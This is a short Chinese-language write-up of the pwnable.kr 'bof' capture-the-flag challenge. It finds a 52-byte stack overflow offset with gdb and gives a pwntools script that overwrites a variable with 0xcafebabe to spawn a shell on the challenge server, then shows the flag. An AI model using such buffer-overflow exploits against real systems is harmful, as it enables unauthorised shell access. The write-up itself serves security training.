pwnable.kr

下載
先將bof 與 bof.c下載下來,先檢查下 bof開啟的保護(hù)

是真的嚇到,基本能開的都開了,但是轉(zhuǎn)念一想,入門級別沒有那么惡心人吧,然后看看源代碼

發(fā)現(xiàn),只是要將傳入的0xdeadbeef通過棧溢出換成0xcafebabe,而且在程序里面已經(jīng)有調(diào)用system("/bin/sh")的語句,只要替換成功就能調(diào)用,那這些保護(hù)基本也沒什么意義嘛。
gdb調(diào)試


繼續(xù)單步,輸入AAAAAAAA,之后x/30x $esp查看??臻g

A的ASCLL值為41,可以看出,我們要覆蓋的地址與輸入地址相差52個字節(jié).
Exp
from pwn import *
r = remote('pwnable.kr','9000')
buf = 52 * 'A'
buf += p32(0xcafebabe)
r.sendline(buf)
r.interactive()
運(yùn)行下

flag =daddy, I just pwned a buFFer :)